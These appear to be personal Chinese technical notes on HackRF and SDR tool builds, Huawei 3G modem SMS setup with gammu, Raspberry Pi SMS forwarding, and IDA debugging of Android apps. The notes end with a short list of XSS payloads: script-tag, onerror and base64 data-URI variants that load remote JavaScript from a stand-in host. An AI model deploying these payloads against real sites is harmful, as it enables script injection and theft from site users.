hackrf-LTE

0x00

代码地址:https://github.com/JiaoXianjun/LTE-Cell-Scanner

0x01

#mkdir build
#cd build
#cmake ../ -- default for rtlsdr and OpenCL ON; OR
#cmake ../ -DUSE_BLADERF=1 -- build for bladeRF; OR
#cmake ../ -DUSE_HACKRF=1 -- build for hackRF
#cmake ../ -DUSE_OPENCL=0 -- disable OpenCL (See notes in later chapter)
#make
#make install

0x02

CMake Error at cmake/Modules/FindITPP.cmake:63 (MESSAGE):Could not find ITPP library

#apt install libitpp-dev

A required library with BLAS API not found. Please specify library location.

#apt install libblas-dev liblapack-dev

0x03

 

#CellSearch --freq-start 1890000000

HackRF基础

一、UHD
安装依赖

#apt-get install libboost-all-dev -y
#apt-get install libusb-1.0-0-dev -y
#apt-get install python-mako -y
#apt-get install doxygen -y
#apt-get install python-docutils -y
#apt-get install cmake -y
#apt-get install build-essential -y

安装git

#apt install git -y

#git clone --recursive git://github.com/EttusResearch/uhd.git

编译

#cd uhd/host

#mkdir build

#cd build

#cmake ../

#make

#make install

设置库路径

#ldconfig

二、HackRF

#apt-get install build-essential cmake libusb-1.0-0-dev pkg-config

#git clone --progress http://github.com/mossmann/hackrf.git

#cd hackrf/host

#mkdir build

#cd build

#cmake ../ -DINSTALL_UDEV_RULES=ON //注释:这条语句的意思是开启hackrf 识别权限

#make

#make install

#ldconfig

#hackrf_info

备注
cmake ../ -DINSTALL_UDEV_RULES=ON 出现
Could NOT find FFTW (missing: FFTW_LIBRARIES FFTW_INCLUDES)

#apt-get install libfftw3-dev libwxgtk3.0-dev

 

三、RadioGNU

#apt-get -y install git-core cmake g++ python-dev swig pkg-config libfftw3-dev libboost-all-dev libcppunit-dev libgsl0-dev libusb-dev libsdl1.2-dev python-wxgtk3.0 python-numpy python-cheetah python-lxml doxygen libxi-dev python-sip libqt4-opengl-dev libqwt-dev libfontconfig1-dev libxrender-dev python-sip python-sip-dev

libboost1.62-dev

#apt-get install gnuradio

#gnuradio-companion

四、gr-osmosdr

#git clone git://git.osmocom.org/gr-osmosdr

#mkdir build

#cd build

#cmake ../

#make

#make install

#ldconfig

五、Gqrx

#apt-get purge --auto-remove gqrx
#apt-get purge --auto-remove gqrx-sdr
#add-apt-repository -y ppa:bladerf/bladerf
#add-apt-repository -y ppa:ettusresearch/uhd
#add-apt-repository -y ppa:myriadrf/drivers
#add-apt-repository -y ppa:myriadrf/gnuradio
#add-apt-repository -y ppa:gqrx/gqrx-sdr
#apt-get update
#apt-get install gqrx-sdr
#gqrx

CentOS-huawei 3g

0x00

#yum install usbutils

#lsusb

Bus 001 Device 002: ID 12d1:1446 Huawei Technologies Co., Ltd. Broadband stick (modem on)

安装libusb
configure: error: "udev support requested but libudev not installed"
#yum install libusb1-devel
##yum install libgudev1.x86_64
##yum install libgudev1-devel

#./configure --disable-udev

usb-modeswitch

#make && make install

usb-modeswitch-data

#make install
#vim /lib/udev/rules.d/40-usb_modeswitch.rules

末尾添加ATTR{idVendor}=="12d1", ATTR{idProduct}=="1f01", RUN+="usb_modeswitch '%b/%k'"

#dmesg | grep tty

0x01

#wvdial

 

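; wvdial.conf — dialer profile read by wvdial(1) to bring up PPP over the
; Huawei stick found on /dev/ttyUSB0 (see the "wvdialconf" step below).
; Comment lines start with ";". Every setting is written "Key = Value";
; the file previously mixed that with "Key=Value" on the FlowControl line.
[Dialer Defaults]
; Modem reset and initialisation strings, sent in numeric order before dialling.
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2
; PDP context: the carrier APN. Change "airtelgprs.com" for another provider.
Init3 = AT+CGDCONT=1,"IP","airtelgprs.com"
stupid mode = 1
Modem Type = USB Modem
; serial speed in bit/s
Baud = 460800
New PPPD = yes
Modem = /dev/ttyUSB0
ISDN = 0
; *99# is the usual GPRS/3G dial string
Phone = *99#
Carrier Check = no
; PPP credentials expected by the carrier. They are stored here in clear
; text, so keep this file owned by root with mode 600.
Password = airtel
Username = airtel
FlowControl = Hardware(CRTSCTS)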

 

#yum install wvdial
#wvdialconf

Found a modem on /dev/ttyUSB0

cmake

#./configure
#gmake
#gmake install

 

gammu-config

#vim /usr/local/bin/gammu-config

gammu: error while loading shared libraries: libGammu.so.8: cannot open shared object file: No such file or directory

ln -s /usr/local/lib64/libGammu.so /usr/lib64/libGammu.so.8
ln -s /usr/local/lib64/libgsmsd.so /usr/lib64/libgsmsd.so.8

0x02

#echo "20170916sms test" |gammu sendsms TEXT 13912345678
#gammu getallsms

0x03

#vim /etc/gammu-smsdrc
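# Gammu library configuration, see gammurc(5)
# /etc/gammu-smsdrc — read by gammu-smsd(1), started with
# "--config /etc/gammu-smsdrc --user ..." (see 0x04 on this page).
# Comment lines start with "#".
[gammu]
# Please configure this!
# Serial device the modem appeared on (see "dmesg | grep tty").
port = /dev/ttyUSB0
connection = at
# Debugging
#logformat = textall

# SMSD configuration, see gammu-smsdrc(5)
[smsd]
# Script executed for every received message. It runs with the daemon's
# privileges and gets sender number and message text through environment
# variables, so it must not be writable by other users and must treat
# those values as untrusted input.
RunOnReceive = /root/sms/smsutil.py
service = sql
driver = native_mysql
logfile = /var/log/gammu-smsd
host = localhost
pc = localhost
# Database credentials. Use the dedicated account created by the GRANT
# statements on this page ('smsd'@'localhost' with SELECT/INSERT/UPDATE/
# DELETE on smsd.*) instead of root; the daemon needs nothing more.
# "password" is a placeholder — set the same real secret in both places.
user = smsd
password = password

database = smsd
# Increase for debugging information
debuglevel = 0
ReceiveFrequency = 60
# SIM PIN, stored in clear text next to the DB password: keep this file
# readable only by root and the user gammu-smsd runs as.
PIN = 1234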

mysql

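-- Dedicated, least-privilege MySQL account for gammu-smsd (service = sql).
-- The user is created explicitly: "GRANT ... IDENTIFIED BY", which created
-- accounts implicitly, is no longer accepted by MySQL 8.
-- Replace 'password' with a real secret and put the same value in the
-- "password =" line of /etc/gammu-smsdrc.
CREATE DATABASE smsd;

CREATE USER 'smsd'@'localhost' IDENTIFIED BY 'password';

-- The daemon only reads and writes rows in the smsd schema; it gets no
-- global privileges and no DDL rights.
GRANT SELECT, INSERT, UPDATE, DELETE ON `smsd`.* TO 'smsd'@'localhost';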

phpMyAdmin
docs/sql/mysql.sql

0x04

#gammu-smsd --config /etc/gammu-smsdrc --pid /var/run/gammu-smsd.pid --daemon --user gamm

 

pi-huawei 3g sms

0x00

树莓派固定IP

#vim /etc/network/interfaces
# /etc/network/interfaces stanza giving wlan0 a fixed address on the LAN.
# The option lines below are grouped as Wi-Fi credentials first, then the
# IPv4 settings; ifupdown does not care about their order.
allow-hotplug wlan0
iface wlan0 inet static
# Network name and pre-shared key passed to wpa_supplicant by the
# ifupdown hook. "psk" is a placeholder; the real key sits here in clear
# text, so keep this file readable only by root.
wpa-ssid ssid
wpa-psk psk
# Static IPv4 configuration; the default route goes via 192.168.1.1.
gateway 192.168.1.1
netmask 255.255.255.0
address 192.168.1.120

重启网卡

#/etc/init.d/networking restart

0x01

#apt-get install gammu

#apt-get install gammu-smsd
#dmesg | grep tty

gammu-config

#gammu getallsms

0x02

#vim /etc/gammu-smsdrc
# Configuration file for Gammu SMS Daemon
# /etc/gammu-smsdrc on the Raspberry Pi: messages are exchanged through
# spool directories (service = files) and every received message is
# handed to forward.sh. Keys are grouped by purpose; gammu-smsd does not
# depend on their order.

[gammu]
# Modem device and driver
port = /dev/ttyUSB0
connection = at

[smsd]
# Storage backend: plain files in the spool directories below
service = files
inboxpath = /var/spool/gammu/inbox/
outboxpath = /var/spool/gammu/outbox/
sentsmspath = /var/spool/gammu/sent/
errorsmspath = /var/spool/gammu/error/

# Outbox file format and over-the-air encoding
outboxformat = unicode
transmitformat = unicode

# Timeouts (seconds, per gammu-smsdrc(5)); statusfrequency 0 = no status reports
commtimeout = 1
sendtimeout = 15
statusfrequency = 0

# Logging
logfile = /var/spool/gammu/log
debuglevel = 2

# Hook run for each received message. Sender number and text arrive in
# environment variables and are untrusted input to that script; keep the
# script owned by root and not writable by other users.
RunOnReceive = /var/spool/gammu/forward.sh

 

#vim /var/spool/gammu/forward.sh
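#!/bin/bash
# forward.sh — gammu-smsd RunOnReceive hook (see /etc/gammu-smsdrc above).
# gammu-smsd exports SMS_MESSAGES, SMS_<i>_NUMBER and SMS_<i>_TEXT before
# running this script; each part is re-sent as an SMS and mailed out.
#
# The sender number and the message text are controlled by whoever texts
# the modem. The original script pushed them through eval, so a message
# containing a double quote or $(...) was executed as shell code. They are
# now only ever used as quoted arguments.

# Honour the part count gammu-smsd provides; the hard-coded 1 dropped every
# part but the first of a multi-part message. Fall back to 1 when run by hand.
SMS_MESSAGES="${SMS_MESSAGES:-1}"

for i in $(seq "$SMS_MESSAGES")
do
    number="SMS_${i}_NUMBER"
    text="SMS_${i}_TEXT"
    # Indirect expansion reads the exported variable by name without
    # re-parsing its contents as shell code.
    num="${!number}"
    txt="${!text}"
    gammu-smsd-inject TEXT my_number_goes_here -text "${num}: ${txt}"
    # printf %s keeps backslash sequences inside the message literal;
    # echo -e would have interpreted them.
    printf 'Phone:%s\nContent:%s\n' "$num" "$txt" | mail -s "$num" 1000@qq.com
done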

0x03

#apt-get install msmtp

#apt-get install mutt
#vim .msmtprc

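# ~/.msmtprc — msmtp(1) account used by mutt as its "sendmail" (see .muttrc).
# msmtp refuses to read this file unless it is owned by the user and has
# no group/other permissions (chmod 600), because it contains the password.
account default
host smtp.163.com
from qq@163.com
# Encrypt the session before authenticating: "auth plain" sends the
# password merely base64-encoded, and without "tls on" msmtp speaks plain
# SMTP, so the credentials would cross the network in the clear.
# Confirm the server offers STARTTLS on the port used before relying on it.
tls on
# CA bundle from the Debian/Raspbian ca-certificates package
tls_trust_file /etc/ssl/certs/ca-certificates.crt
auth plain
user qq@163.com
# Placeholder; "passwordeval" can fetch the real secret from a keyring
# instead of keeping it in this file.
password password
logfile /var/log/msmtp.log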
#vim .muttrc
# ~/.muttrc — send outgoing mail through msmtp (configured in ~/.msmtprc).
# "set" lines are order-independent; grouped as editor, identity, transport.
set editor="vim"
set realname="qq"
set use_from=yes
set sendmail="/usr/bin/msmtp"
#echo "this is test mail" |mutt -s "test20170916" 100@qq.com

0x04

#gammu-smsd --config /etc/gammu-smsdrc --pid /var/run/gammu-smsd.pid --daemon --user gamm

 

IDA动态调试android dex

0x00

推送android_server到android手机:

#adb push D:\Documents\share\IDA\dbgsrv\android_server /data/local/tmp/android_server

设置777权限:

#cd /data/local/tmp/

#chmod 777 android_server

启动该文件:

#./android_server

新开个cmd窗口,进行端口转发:

#adb forward tcp:23946 tcp:23946

启动所要调试的activity:

#adb shell am start -D -n com.a.a/.MainActivity

0x01

启动ida pro

"Debugger -> Process options":

#"Debugger -> Attach -> Remote ArmLinux/Android debugger":

#Hostname->localhost

“Debug options”:

在弹出的窗口中选择你要调试的进程,搜索dex。

 

F9执行 F2下断点

 

注意:如果运行过程中一直显示下图所示窗口,就需要关注一下手机上的屏幕界面,看是否是需要与用户进行交互了。

xss远程调用

0x00

<script src='http://www.a.com/a.js'></script>

0x01

<img src=x onerror=document.body.appendChild(document.createElement('script')).src='http://www.a.com/a.js'>

0x02

base64

<script src=http://www.a.com/a.js></script>对应的base64:PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5hLmNvbS9hLmpzPjwvc2NyaXB0Pg==

<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5hLmNvbS9hLmpzPjwvc2NyaXB0Pg=="></object>
<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5hLmNvbS9hLmpzPjwvc2NyaXB0Pg=="></iframe>